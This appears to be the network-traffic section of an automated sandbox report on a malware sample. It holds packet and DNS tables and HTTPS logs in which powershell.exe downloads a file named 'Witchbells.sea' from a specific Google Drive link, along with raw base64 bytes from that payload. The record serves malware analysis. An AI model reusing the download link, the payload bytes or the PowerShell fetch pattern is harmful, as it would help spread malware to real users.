                                              Oct 25, 2024 19:44:09.672220945 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.672414064 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.718164921 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.718374968 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.718389034 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.718436956 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.725658894 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.725713968 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.725720882 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.725768089 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.728081942 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.728132963 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.728205919 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.728370905 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.735739946 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.735801935 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.738624096 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.738707066 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.738728046 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.738771915 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.738782883 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.738825083 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.739145041 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.739204884 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.747900963 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.747978926 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.747984886 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.748047113 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.760307074 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.760422945 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.760431051 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.760479927 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.776113033 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.776173115 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.776180983 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.776228905 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.785701036 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.785758972 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.785773039 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.785823107 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.798105955 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.798198938 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.798264027 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.798310995 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.835606098 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.835689068 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.835731030 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.835794926 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.835808992 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.835865021 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.843478918 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.843548059 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.845511913 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.845596075 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.845650911 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.845705986 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.848565102 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.848627090 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.855709076 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.855789900 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.861285925 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.861346960 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.861363888 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.861417055 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.873625994 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.873687029 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.873704910 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.873760939 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245157003 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245209932 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245235920 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245362043 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245362043 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245362043 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245435953 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245495081 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245567083 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245616913 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245631933 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245685101 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245697975 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245747089 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.246201992 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.246263027 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.246274948 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.246320009 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.246320963 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.246332884 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.246367931 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.246387959 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.247137070 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.247186899 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.247198105 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.247263908 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.247277975 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.247330904 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.247338057 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.247351885 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.247415066 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.247415066 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.248069048 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.248121977 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.248135090 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.248176098 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.248186111 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.248198032 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.248226881 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.248245955 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.248255014 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.248306990 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.249108076 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.249160051 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.250997066 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.251045942 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.251070976 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.251104116 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.251116037 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.251128912 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.251159906 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.251187086 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.251430035 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.251478910 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253079891 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253170013 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253222942 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253269911 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253283978 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253334045 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253411055 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253458977 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253463030 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253473997 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253510952 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253523111 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253545046 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253575087 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253599882 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.295733929 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.295783043 CEST44349740172.217.16.193192.168.2.4

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 25, 2024 19:43:20.045927048 CEST5733353192.168.2.41.1.1.1
                                              Oct 25, 2024 19:43:20.053527117 CEST53573331.1.1.1192.168.2.4
                                              Oct 25, 2024 19:43:21.397278070 CEST6104353192.168.2.41.1.1.1
                                              Oct 25, 2024 19:43:21.406833887 CEST53610431.1.1.1192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Oct 25, 2024 19:43:20.045927048 CEST192.168.2.41.1.1.10x3eb3Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                              Oct 25, 2024 19:43:21.397278070 CEST192.168.2.41.1.1.10x60d5Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Oct 25, 2024 19:43:20.053527117 CEST1.1.1.1192.168.2.40x3eb3No error (0)drive.google.com142.250.185.238A (IP address)IN (0x0001)false
                                              Oct 25, 2024 19:43:21.406833887 CEST1.1.1.1192.168.2.40x60d5No error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • drive.google.com
                                              • drive.usercontent.google.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449730142.250.185.2384437100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 17:43:20 UTC215OUTGET /uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: drive.google.com
                                              Connection: Keep-Alive
                                              2024-10-25 17:43:21 UTC1610INHTTP/1.1 303 See Other
                                              Content-Type: application/binary
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Fri, 25 Oct 2024 17:43:21 GMT
                                              Location: https://drive.usercontent.google.com/download?id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e&export=download
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                              Content-Security-Policy: script-src 'nonce--phou_tpzcJJKD23-KRofQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                              Cross-Origin-Opener-Policy: same-origin
                                              Server: ESF
                                              Content-Length: 0
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449731142.250.185.2384437100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 17:43:26 UTC121OUTGET /uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e HTTP/1.1
                                              Host: drive.google.com
                                              Connection: Keep-Alive
                                              2024-10-25 17:43:26 UTC1319INHTTP/1.1 303 See Other
                                              Content-Type: application/binary
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Fri, 25 Oct 2024 17:43:26 GMT
                                              Location: https://drive.usercontent.google.com/download?id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e&export=download
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ugPDwgbpipAK2Dzg-BF62A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                              Cross-Origin-Opener-Policy: same-origin
                                              Server: ESF
                                              Content-Length: 0
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449732172.217.16.1934437100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 17:43:27 UTC139OUTGET /download?id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e&export=download HTTP/1.1
                                              Host: drive.usercontent.google.com
                                              Connection: Keep-Alive
                                              2024-10-25 17:43:29 UTC4916INHTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Content-Security-Policy: sandbox
                                              Content-Security-Policy: default-src 'none'
                                              Content-Security-Policy: frame-ancestors 'none'
                                              X-Content-Security-Policy: sandbox
                                              Cross-Origin-Opener-Policy: same-origin
                                              Cross-Origin-Embedder-Policy: require-corp
                                              Cross-Origin-Resource-Policy: same-site
                                              X-Content-Type-Options: nosniff
                                              Content-Disposition: attachment; filename="Witchbells.sea"
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: false
                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                              Accept-Ranges: bytes
                                              Content-Length: 433020
                                              Last-Modified: Thu, 24 Oct 2024 09:06:20 GMT
                                              X-GUploader-UploadID: AHmUCY14zGJEuWoNXlrxCBzIr_13f9aYMN2B2AQFDLfiKHU20Uqrs_USMPzkRgLNIvuAB_ehWM1T92o8KA
                                              Date: Fri, 25 Oct 2024 17:43:29 GMT
                                              Expires: Fri, 25 Oct 2024 17:43:29 GMT
                                              Cache-Control: private, max-age=0
                                              X-Goog-Hash: crc32c=XNy+Sw==
                                              Server: UploadServer
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close
                                              2024-10-25 17:43:29 UTC4916INData Raw: 63 51 47 62 63 51 47 62 75 31 70 62 45 67 44 72 41 6c 68 58 36 77 4b 6a 45 51 4e 63 4a 41 52 78 41 5a 76 72 41 6a 47 42 75 57 49 78 6c 64 7a 72 41 68 4f 59 63 51 47 62 67 66 47 43 48 49 43 56 36 77 4a 72 46 58 45 42 6d 34 48 78 34 43 30 56 53 65 73 43 2f 63 42 78 41 5a 76 72 41 71 6f 4f 36 77 4a 6e 62 37 72 48 69 71 58 75 63 51 47 62 36 77 4b 71 2b 4f 73 43 64 72 72 72 41 76 5a 66 4d 63 72 72 41 6c 41 6c 36 77 4c 6b 62 49 6b 55 43 33 45 42 6d 33 45 42 6d 39 48 69 36 77 4c 6b 47 65 73 43 57 4f 61 44 77 51 54 72 41 74 31 4c 63 51 47 62 67 66 6c 6d 31 32 34 42 66 4d 6c 78 41 5a 74 78 41 5a 75 4c 52 43 51 45 63 51 47 62 36 77 4a 34 7a 34 6e 44 36 77 49 38 2b 2b 73 43 31 67 4f 42 77 2f 67 72 4f 41 42 78 41 5a 76 72 41 6e 79 36 75 6d 34 55 68 69 6e 72 41 68 42
                                              Data Ascii: cQGbcQGbu1pbEgDrAlhX6wKjEQNcJARxAZvrAjGBuWIxldzrAhOYcQGbgfGCHICV6wJrFXEBm4Hx4C0VSesC/cBxAZvrAqoO6wJnb7rHiqXucQGb6wKq+OsCdrrrAvZfMcrrAlAl6wLkbIkUC3EBm3EBm9Hi6wLkGesCWOaDwQTrAt1LcQGbgflm124BfMlxAZtxAZuLRCQEcQGb6wJ4z4nD6wI8++sC1gOBw/grOABxAZvrAny6um4UhinrAhB
                                              2024-10-25 17:43:30 UTC4867INData Raw: 2b 5a 65 36 48 31 63 47 69 4d 38 37 66 69 77 58 52 69 65 34 41 38 43 72 62 2b 65 39 52 48 65 2f 48 56 4f 2f 58 6a 58 65 71 70 55 70 39 47 36 43 50 2f 65 37 69 31 47 4e 6c 71 68 5a 53 4d 4d 6e 6f 46 67 2f 39 55 73 63 74 42 74 51 6d 62 79 6e 63 53 72 56 6c 53 77 2b 36 4d 46 6e 66 5a 46 70 5a 78 4a 37 37 73 70 32 4d 57 44 77 36 4d 57 56 2f 36 39 32 7a 70 7a 79 70 68 39 51 57 38 32 62 79 71 39 65 6d 66 35 6d 34 35 47 6d 38 4b 69 65 70 69 36 77 6e 71 59 75 73 49 51 59 47 75 73 38 75 4f 6a 4e 69 30 30 68 6b 61 6f 44 5a 65 67 59 50 43 50 4d 4a 6a 36 63 4a 35 76 77 49 62 47 41 68 53 36 77 6e 71 59 75 73 4a 36 6d 43 53 45 56 67 77 52 45 44 34 56 62 73 37 34 69 70 51 58 62 70 43 36 77 7a 78 38 65 6b 68 6b 50 72 30 45 33 37 6d 39 34 48 32 64 4a 4a 71 63 34 66 43 77
                                              Data Ascii: +Ze6H1cGiM87fiwXRie4A8Crb+e9RHe/HVO/XjXeqpUp9G6CP/e7i1GNlqhZSMMnoFg/9UsctBtQmbyncSrVlSw+6MFnfZFpZxJ77sp2MWDw6MWV/692zpzyph9QW82byq9emf5m45Gm8Kiepi6wnqYusIQYGus8uOjNi00hkaoDZegYPCPMJj6cJ5vwIbGAhS6wnqYusJ6mCSEVgwRED4Vbs74ipQXbpC6wzx8ekhkPr0E37m94H2dJJqc4fCw
                                              2024-10-25 17:43:30 UTC1378INData Raw: 44 58 4c 6c 34 5a 68 32 75 38 31 48 33 2f 42 49 37 32 2b 4a 2b 43 50 6b 77 6e 59 65 72 47 41 73 47 4e 5a 4d 66 32 2b 55 6e 47 31 68 48 32 44 50 6e 41 69 2f 4a 73 5a 6b 37 71 33 4c 6e 72 57 62 37 72 58 79 41 38 71 74 4d 37 4e 4b 30 4c 4c 31 58 38 71 45 64 44 71 30 69 77 75 38 61 62 33 62 77 79 52 6c 32 62 65 30 79 72 30 63 59 46 6a 2f 72 48 30 6d 4e 74 66 78 70 70 36 2f 47 68 36 55 34 66 58 64 6a 30 6a 73 4b 43 42 75 64 4f 54 63 4f 45 53 69 79 45 70 6e 33 32 65 2f 4f 48 6c 53 2f 6c 78 63 44 52 6d 46 44 4b 6f 56 61 64 33 78 57 71 78 57 2b 78 63 75 6a 6c 72 78 69 52 71 65 6f 58 6a 45 30 2f 34 2b 42 59 64 75 6a 65 52 34 71 55 66 36 76 69 4a 6a 79 56 6a 58 72 42 36 37 49 6d 68 35 62 4b 38 34 65 39 65 65 79 37 68 75 38 31 63 78 30 68 52 6b 4e 52 50 43 7a 39 70
                                              Data Ascii: DXLl4Zh2u81H3/BI72+J+CPkwnYerGAsGNZMf2+UnG1hH2DPnAi/JsZk7q3LnrWb7rXyA8qtM7NK0LL1X8qEdDq0iwu8ab3bwyRl2be0yr0cYFj/rH0mNtfxpp6/Gh6U4fXdj0jsKCBudOTcOESiyEpn32e/OHlS/lxcDRmFDKoVad3xWqxW+xcujlrxiRqeoXjE0/4+BYdujeR4qUf6viJjyVjXrB67Imh5bK84e9eey7hu81cx0hRkNRPCz9p
                                              2024-10-25 17:43:30 UTC1378INData Raw: 2f 41 73 73 4a 34 65 69 36 7a 30 31 77 50 57 4f 30 35 4a 68 61 6e 69 4b 6a 62 4d 48 50 4e 4c 6b 65 69 76 63 6f 32 52 68 68 41 66 5a 41 41 43 31 72 65 6e 67 6c 6c 53 63 64 4d 6f 4d 45 55 65 78 65 55 50 77 2f 70 65 2b 6f 77 64 45 35 6d 51 51 51 54 4e 67 48 79 48 4d 65 54 45 6b 79 61 44 47 79 6c 39 43 39 34 36 62 7a 67 66 54 53 34 6e 55 44 2b 76 51 7a 6c 70 37 59 77 66 56 65 35 65 4c 6e 53 6e 6f 33 30 76 73 37 78 59 41 4c 68 4f 33 54 73 34 4d 59 75 6e 6f 2f 33 42 50 72 44 43 55 51 77 4d 63 61 50 6c 6d 43 49 36 54 36 63 32 68 65 34 6b 52 7a 38 59 53 4f 76 4f 4c 61 76 6d 6e 4b 59 75 54 2b 75 43 52 6f 37 73 49 2f 2f 68 4a 7a 68 62 73 4b 6f 6e 33 36 5a 38 6b 57 77 78 64 36 2b 64 4b 61 67 6e 78 30 57 6d 68 4e 38 78 58 32 54 34 4e 43 38 76 4a 30 52 52 41 53 58 41
                                              Data Ascii: /AssJ4ei6z01wPWO05JhaniKjbMHPNLkeivco2RhhAfZAAC1rengllScdMoMEUexeUPw/pe+owdE5mQQQTNgHyHMeTEkyaDGyl9C946bzgfTS4nUD+vQzlp7YwfVe5eLnSno30vs7xYALhO3Ts4MYuno/3BPrDCUQwMcaPlmCI6T6c2he4kRz8YSOvOLavmnKYuT+uCRo7sI//hJzhbsKon36Z8kWwxd6+dKagnx0WmhN8xX2T4NC8vJ0RRASXA
                                              2024-10-25 17:43:30 UTC1378INData Raw: 6f 55 32 4b 66 57 6a 46 6f 6e 32 38 79 5a 79 38 67 53 4a 38 42 66 74 45 57 34 65 72 31 48 49 78 6c 51 32 34 69 59 71 79 79 5a 48 42 38 79 78 70 74 33 71 57 46 37 4c 67 50 64 54 65 2f 2f 4a 30 56 78 58 35 2f 71 67 30 30 78 6b 36 73 76 4f 45 39 51 53 62 2f 6e 78 62 2b 37 6c 4e 34 77 75 79 64 54 6d 68 52 6c 31 64 71 74 53 74 5a 32 4b 55 75 73 4d 57 58 2f 44 6b 6a 37 79 79 77 6e 71 6e 70 67 54 75 6d 4c 72 43 65 70 69 36 77 6e 71 6d 75 62 61 4e 38 4d 59 77 5a 71 73 73 59 78 72 62 6e 67 47 7a 39 44 4c 77 67 45 4b 2b 68 48 43 71 58 37 55 51 75 4d 73 6b 77 49 6e 34 49 52 43 2f 35 35 35 47 6e 36 6e 4b 65 70 69 36 77 6e 71 59 75 73 49 2f 54 68 63 41 54 53 43 48 49 53 4c 54 41 33 46 43 75 59 47 56 39 4d 37 66 4c 50 65 63 63 4a 4e 4c 39 66 50 46 52 33 44 57 36 52 76
                                              Data Ascii: oU2KfWjFon28yZy8gSJ8BftEW4er1HIxlQ24iYqyyZHB8yxpt3qWF7LgPdTe//J0VxX5/qg00xk6svOE9QSb/nxb+7lN4wuydTmhRl1dqtStZ2KUusMWX/Dkj7yywnqnpgTumLrCepi6wnqmubaN8MYwZqssYxrbngGz9DLwgEK+hHCqX7UQuMskwIn4IRC/555Gn6nKepi6wnqYusI/ThcATSCHISLTA3FCuYGV9M7fLPeccJNL9fPFR3DW6Rv
